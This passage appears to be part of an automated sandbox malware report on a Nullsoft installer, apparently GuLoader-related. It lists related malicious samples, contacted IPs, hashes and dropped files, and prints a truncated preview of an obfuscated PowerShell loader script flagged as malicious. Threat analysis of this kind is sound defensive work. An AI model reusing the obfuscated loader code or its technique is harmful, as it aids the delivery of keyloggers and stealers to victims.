                                                                                                                                        • 149.154.167.220
                                                                                                                                        CLOUDFLARENETUSWGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        wymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • 104.21.96.1
                                                                                                                                        H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 104.21.112.1
                                                                                                                                        Gz2FxKx2cM.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 104.21.36.62
                                                                                                                                        cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                        • 104.16.184.241
                                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 104.21.32.1
                                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 104.21.48.1
                                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 104.21.80.1
                                                                                                                                        Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                        • 188.114.96.3
                                                                                                                                        UTMEMUSH75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 132.226.8.169
                                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 132.226.247.73
                                                                                                                                        Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • 132.226.247.73
                                                                                                                                        6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 132.226.247.73
                                                                                                                                        7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                        • 132.226.8.169
                                                                                                                                        rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 132.226.247.73
                                                                                                                                        4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        • 132.226.247.73
                                                                                                                                        b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 132.226.8.169
                                                                                                                                        UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 132.226.8.169
                                                                                                                                        9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 132.226.247.73
                                                                                                                                        ACENS_ASSpainHostinghousingandVPNservicesESdb0fa4b8db0333367e9bda3ab68b8042.spc.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                        • 109.70.39.177
                                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                        • 176.28.123.52
                                                                                                                                        loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                        • 77.240.124.207
                                                                                                                                        https://desactivacion-correo.s3.eu-north-1.amazonaws.com/es.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                        • 217.116.0.245
                                                                                                                                        jew.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 81.46.244.159
                                                                                                                                        x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                        • 109.70.39.189
                                                                                                                                        nklx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 213.149.254.180
                                                                                                                                        la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                        • 89.17.213.27
                                                                                                                                        Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 217.116.0.191
                                                                                                                                        Scanned Docs from Emnes Metal Sdn Bhd_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 217.116.0.191
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        54328bd36c14bd82ddaa0c04b25ed9adWGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        wymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0eWGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        4z8Td6Kv8R.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        4z8Td6Kv8R.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        37f463bf4616ecd445d4a1937da06e19WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 142.250.184.238
                                                                                                                                        • 142.250.181.225
                                                                                                                                        TVPfW4WUdj.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                        • 142.250.184.238
                                                                                                                                        • 142.250.181.225
                                                                                                                                        WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                        • 142.250.184.238
                                                                                                                                        • 142.250.181.225
                                                                                                                                        WtZl31OLfA.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                        • 142.250.184.238
                                                                                                                                        • 142.250.181.225
                                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 142.250.184.238
                                                                                                                                        • 142.250.181.225
                                                                                                                                        Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 142.250.184.238
                                                                                                                                        • 142.250.181.225
                                                                                                                                        rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 142.250.184.238
                                                                                                                                        • 142.250.181.225
                                                                                                                                        4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        • 142.250.184.238
                                                                                                                                        • 142.250.181.225
                                                                                                                                        b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 142.250.184.238
                                                                                                                                        • 142.250.181.225
                                                                                                                                        9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 142.250.184.238
                                                                                                                                        • 142.250.181.225
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dllWtZl31OLfA.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                          4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                            TeamViewer_Setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              DHL TAX INVOICES - MARCH 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                REF_17218_VV-0002.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                  PO_00290292.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                    teamviewer_Px-yDq1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      teamviewer_Px-yDq1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        SMGS-RCDU5010031.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                          SMGS-RCDU5010031.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):53158
                                                                                                                                                            Entropy (8bit):5.062687652912555
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                                                                                                                            MD5:5D430F1344CE89737902AEC47C61C930
                                                                                                                                                            SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                                                                                                                            SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                                                                                                                            SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                                            Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Reputation:high, very likely benign file
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):60
                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                            Process:C:\Users\user\Desktop\Kb94RzMYNf.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):6656
                                                                                                                                                            Entropy (8bit):5.140229856656103
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:J7fhfKaGgchPzxK6bq+pKX6D8ZLidGgmkN738:HbGgGPzxeX6D8ZyGgmkN
                                                                                                                                                            MD5:01E76FE9D2033606A48D4816BD9C2D9D
                                                                                                                                                            SHA1:E46D8A9ED4D5DA220C81BAF5F1FDB94708E9ABA2
                                                                                                                                                            SHA-256:EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
                                                                                                                                                            SHA-512:62EF7095D1BF53354C20329C2CE8546C277AA0E791839C8A24108A01F9483A953979259E0AD04DBCAB966444EE7CDD340F8C9557BC8F98E9400794F2751DC7E0
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                            • Filename: WtZl31OLfA.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: 4Vx2rUlb0f.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: TeamViewer_Setup.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: DHL TAX INVOICES - MARCH 2024.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: REF_17218_VV-0002.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: PO_00290292.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: teamviewer_Px-yDq1.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                                                                                                                            • Filename: SMGS-RCDU5010031.exe, Detection: malicious, Browse
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,..................Rich...........PE..L....z.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..L.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Users\user\Desktop\Kb94RzMYNf.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):362270
                                                                                                                                                            Entropy (8bit):1.2455855418607977
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:8ISzVYclAygkWLgNhIaJiUYphjwPRryaqA:8bduh6hKUYp5aryaz
                                                                                                                                                            MD5:9FA2163989C46356E859FEA0B8963C98
                                                                                                                                                            SHA1:7C4909CBFBFBE47621E33E4FFCBDD07305BFB61A
                                                                                                                                                            SHA-256:3F02D54A3EC1FECE8CC150F8C9DE04BA12D69A8A221AC97D64161E76E52DF25C
                                                                                                                                                            SHA-512:39B7C5856903FEA66941551A89E936035C35A98C5B7587F34333626995F4D0A2A1B88E4CAC03865F9785BEF36E272875D84E3CCF221513D7139A4237085021F6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.......c.....W.................X...{..................................c.......................................................>.................................^......y..................B..)....................................................X...........^.......................j.............}.................................%.................;....................................................................................................................f.....................................................................T........E.............................0......................>............................OJ..........................~........................~......G..............................i.s...........a...%........:...........?..........>v...........................................................................................a.,.............................."..................7..........................................).]............................P.................
                                                                                                                                                            Process:C:\Users\user\Desktop\Kb94RzMYNf.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):261410
                                                                                                                                                            Entropy (8bit):1.2549428792982014
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:Qwiy4uufWUw/8VP6g263Bho3fURSx13Q3pA/988PSEAyx6NQB1lir1f/R/qwV5iw:QDbZBhAUEoIGV/xh5DcPJsc/1si2
                                                                                                                                                            MD5:37AEF816B4DE967A79095F52FE324B50
                                                                                                                                                            SHA1:5F77040A1BF5EC66220083597D4FAA06F5FE1B9D
                                                                                                                                                            SHA-256:3627F4556F8AC2105AB3DC8A5F0C149E1D8DE3520E50447F7F654DA939BA6946
                                                                                                                                                            SHA-512:D65B2C9B80A825D3C77173E50D3A10F7FDAECCD58E2E385A095DDC2FB97554B8C6E027776333537A3B88226BDEC2A54A9B21E74E138556667E0B6C35491BC2A0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..........................c..........................................................................................................L......................................0......................)....................1D......................R....|.............................................................................c.........................Y..H............{......3...............s.........Z.................!.....{.......................$.............................................J........................,.............[......M...............;....................................................k..2.z...............................s.........R..............................J....g......................................................................................>.....................n....s.......................................................z...........?..................................4............r...............................................................................
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):783354
                                                                                                                                                            Entropy (8bit):7.774177303886318
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:0GCX77iIceZ0Na7lxnjXp54AQ2cPmT3a3ur93tRLPHj6XOahq:qr75cHavj7S1G3aer93tJPDUO/
                                                                                                                                                            MD5:EE18481E218CC9BC7A1628F5A7365776
                                                                                                                                                            SHA1:57EA302C84A488DE1E5A5BCC669E02C5D9A7A350
                                                                                                                                                            SHA-256:F19B72B88DDBF56B257E6EEF19C74E304BEAF8F95D352741E400993472E721C9
                                                                                                                                                            SHA-512:A4AE4E6F3D46C05141E1D60B3F92D1B2AD27D758AE27BC063FB3F5FEF953237120480E700C5D05D90CC41D92497674C0E7D3E25DBD62E591445170077309F78B
                                                                                                                                                            Malicious:true
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L....z.W.................d...........2............@..........................0............@..........................................0...............................................................................................................text...{c.......d.................. ..`.rdata...............h..............@..@.data...............~..............@....ndata.......P...........................rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):26
                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                            Process:C:\Users\user\Desktop\Kb94RzMYNf.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):341258
                                                                                                                                                            Entropy (8bit):7.5908351004492856
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6144:JEBKpWL+9zQgh3aN1OQXMDxRIEVzK58aDIr4h8:JEBKpWK9zBh41OuGPI/u2M4h8
                                                                                                                                                            MD5:A01A7B6997298405D8DB82D7019581B1
                                                                                                                                                            SHA1:DB88DB262A5A9B901E79F164528DFCE4DEC096E1
                                                                                                                                                            SHA-256:B65ED13D031C96566DC34332BD1BC3AE757911BAE5E348D9A8819905289F7620
                                                                                                                                                            SHA-512:5CEAF1BBE6A7BB3BA41568328A27803FE028F0D347345059A05EE2A980C84BABF17734B4B9529EC6F847308A4C9EE5AA90E69194504D74273E8CEE7507A787F3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:........y..................DD.TT...<.................................q.......qqq./.ll.;...]..V.......................L.....@.........W.9999.hhhhhh.......7.......a....................&..........I...........=.........z.......t.................0000....................yy.................v.....?.............\........nnn...............___..............TTTTTTTTTTT.rr.(..........c............**...............m....................................."......>.P.gggg.....................ZZZZ.....:..........l...FFF.............t..................rr.......K.**....X..........<....c..........11....}......??.........&&..............SSSS.W.....h.....99....................M.1.......D...r..........c.7.......RR..LLLLLLLL...........................v.....yyy...S........'............................}.w....(...~..TT......PPPPPPPP..............VVV...............~......................=............```.......++.................................z............2.ee....j........ll.v......../.........................<....
                                                                                                                                                            Process:C:\Users\user\Desktop\Kb94RzMYNf.exe
                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (4183), with CRLF, LF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):70162
                                                                                                                                                            Entropy (8bit):5.182472338613328
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:768:izMpl7Jm9+tcfqGwXX1bP7fCcwk2ozhJpvITk7Sdr74CRFCCOYon+RbxW1hNXgrG:bxcyb9+wtJpvITj7RTGh1grXV4Los
                                                                                                                                                            MD5:0751B57E7C9836548F433D8A91BBC582
                                                                                                                                                            SHA1:5F12A72DA78DA084E25B751B11A5E556CC88F6D5
                                                                                                                                                            SHA-256:7307EB64E3419383D4EC7BD555F85EE9CA56E0972D75FD74A8949F4E412448F7
                                                                                                                                                            SHA-512:2EE12BD05F884332A51587A3664488356C3149EA1971D9FD9BF474EF01EE2D78C01CD981130EB2BCD152EB3A685F4C6C385C4D4835E100510CD93AD6F43993A6
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview:$Pulveriserede=$Trichitis166ndblsende194;........$Tzontle = @'.Epongek.agammag$IllustrPunbuyaboWreckaglAme ropidoblingtDia hthu Moc asr UltraheHypersprOmphalosSkrmbl =Korre.t$Eks.erimAfmystioThriceccBarsjeakKlubmd eDykker.rKriminoyKnickkn;None pi.KartonefSabbatsuFald,ydn Int mecRec.llet SupersiKarakteoMavefornTilsy.s DishonoCUtilitaaZerkpenpRumpa,ei Csarist.eudeckuDecarnalNonexteaTygningrOppiske6Uncriti Bet lin(,ncrema$UdstrknW GympieyElicitestrafi moSonnetin arbuil,Brac ym$ Bilg,wPSow rshrBanebryeOrds rrcS ngefoeRhetorir Coiffue Telegrmunresplo HetzednTraditiiS.ferhieFa hions Punkts)Sgersdu Pr teac{almvina.Rissian. Daises$Fork rtC NovemboAnmrk iiStrstevnArtocarvInacceno esteplCalpollv AlvorseHelikop Jeree.t(KlkkeliNPengebeaCyklingtDeposituFlonelsrSpeci laekstenslBekymrikMini atoFll.sannComputeoPolyc rm unsymbiNonplatsPrivate Po,lin' L stelMResurgeeTerrorgs ScutchhHeltesaiastrerreSprsamarUnderle$EnlistmHVideresu PaaklinBogudlatProgramsSee,stomSelverkaFortolkWOmsti lFCircularTra.esc,
                                                                                                                                                            Process:C:\Users\user\Desktop\Kb94RzMYNf.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):452801
                                                                                                                                                            Entropy (8bit):1.253535297499313
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:R7Kt/6RsOVcDyFtUkKQGef5fnB6vj/MuIqMas+dEgEcn03:DpVZBKsH6vFhMas+nn03
                                                                                                                                                            MD5:36666AD5AFAD8972D1AC9D4BB141614D
                                                                                                                                                            SHA1:2F50E39B78F2E1B8B751F61FDDCA0478B8A98274
                                                                                                                                                            SHA-256:03325F7F88E997850F990A57E7DA4A4A9EDB0597E76110522D8DB6DA14F822E8
                                                                                                                                                            SHA-512:51AF93E94F43711C7DDC75C08EBA8AD82E36799BAEC3F69572D0FEA349E3F9809D53D07EA6E4A430D46509FE88B923BC1EFDE1F8D414C9CEBBEF731D1C69F818
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.................................V..m....[.....................6.....................y....................................................i........................................l..................................1..r........Y.......\........@............p............................................................................................................................[.....?.................................................................................................u.'..........................................................a......)........}.....Z..........................................................................C............................B..............................F...........................................D.............H.............O...........~.....................................................F.......................n.D...........................................................N.................................................t.................7...
                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                            Entropy (8bit):7.774177303886318
                                                                                                                                                            TrID:
                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                            File name:Kb94RzMYNf.exe
                                                                                                                                                            File size:783'354 bytes
                                                                                                                                                            MD5:ee18481e218cc9bc7a1628f5a7365776
                                                                                                                                                            SHA1:57ea302c84a488de1e5a5bcc669e02c5d9a7a350
                                                                                                                                                            SHA256:f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9
                                                                                                                                                            SHA512:a4ae4e6f3d46c05141e1d60b3f92d1b2ad27d758ae27bc063fb3f5fef953237120480e700c5d05d90cc41d92497674c0e7d3e25dbd62e591445170077309f78b
                                                                                                                                                            SSDEEP:12288:0GCX77iIceZ0Na7lxnjXp54AQ2cPmT3a3ur93tRLPHj6XOahq:qr75cHavj7S1G3aer93tJPDUO/
                                                                                                                                                            TLSH:7CF4E0B2DF397522ED489872E42B1DF797744872CA64E8123152BC37F5209A6EF0920F
